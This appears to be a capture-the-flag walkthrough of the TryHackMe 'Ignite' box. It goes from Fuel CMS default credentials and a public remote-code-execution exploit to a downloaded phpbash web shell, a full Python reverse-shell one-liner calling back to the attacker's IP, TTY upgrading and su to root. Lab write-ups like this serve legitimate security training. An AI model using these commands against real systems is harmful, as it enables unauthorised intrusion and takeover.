We begin with a simple nmap scan on the target and some of our key findings are a homepage which lands us us to “Welcome to Fuel Cms” running on version 1.4 ….now upon going through the main welcome page, we come across the default credentials admin:admin ….We also do a dirb scan and find robots.txt and a /fuel directory where the login page is located. The default credentials indeed work and we login the Fuel cms !!! but dont find anything interesting in it.
Now a MUST DO thing is to look for exploits regarding any CMS and we have the version as well. simply google search “fuel cms exploit” and go to the first exploit and download it.This exploit allows Remote Code Execution.
We will have to make some minor changes to the exploit like changing the ip address to our target’s ip adress of tryhackme and commenting out the line.Since we are not running this exploit through burp, we will have to comment the line “proxy=xxxxx” and also in “r = requests.get” we will only take the burp01url and remove the proxy here as well. (If you have basic knowedge of python, this is simple to understand)….SO this is what our final exploit will look like:
Now crack open a terminal and type python “filename.py” (for me it is- python fuel_exploit.py) and u will get a cmd shell NICE!!! …u can run a command like whoami and ls but u will see that it seems broken and the shell is crap and we get some php errors..…so we need a better shell.
For a better shell, we can use this awesome script called phpbash which gives us a semi -interactive shell on our browser itself.You can get it here
You can't perform that action at this time. You signed in with another tab or window. You signed out in another tab or…
You can simply view it as raw and run the wget command it in your terminal to download it and the usage is simple….after u download it(phpbash.php),on the same directory start a simple http python server using the command- python -m SimpleHttpServer 80 this allows us to run a simple web server in our localhost so that we can upload/download files…..Our plan is to go to our target shell and from there we can use wget to download the phpbash.php file using the command- “wget AttackerIP filename”
Run this command in the cmd: (the useless php shell of our target) and once done, run the “ls” command and u will see the file “phpbash.php” NOW all we have to do is go to our browser url and type: “targetIP filename” the image below will make it clear-
PATH TO ROOT
From here we can try to privilege escalate HOWEVER Here’s the twist. Php bash is not a real proper terminal and we will get errors and wont be able to privilege escalate.We need a Real & Proper shell. For this we run nc -nlvp 7777 in our terminal and run this python reverse shell in our php bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOURIPADDRESS",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);`
copy paste this and run in your php bash….(u can easily get such reverse shells from github repos like payloadAllTheThings or pentest monkey)
Great !!! we get a reverse connection on our netcat listener and we run “whoami” command and we see that we now have a reverse shell as “www-data”. However this shell still won’t do what we want it to, so we need to get full tty for an interactive shell. So , enter this python command:
python -c 'import pty; pty.spawn("/bin/bash")'.Then, press CTRL+Z to put the shell in the background. Next, type this command in the same window:
stty raw -echo;fg. This will bring your shell back to the foreground with full interactive experience.
FINALLY We have a proper shell ! and can try to privilege escalate manually and by using scripts but We get no clue.Here’s the twist-if you go to the main page where we had got the default credentials admin:admin, there is this important piece of info which i had missed as well !
so the database.php file contains usernames and passwords, so simply go to the pirticular directory and cat database.txt to read the info in it (NOTE:if u are having trouble locating the file, run the command “locate database.php)
NOW just run the command “su” or “su root” > enter password and you are ROOT! You will find the flag in the /root directory.
WE HAVE SUCCESSFULLY ROOTED IGNITE AND Found Both Flags.I hope you liked this walkthrough of Ignite and learned something.in case of any doubts, do check out this other writeup(https://exploits.run/ignite/)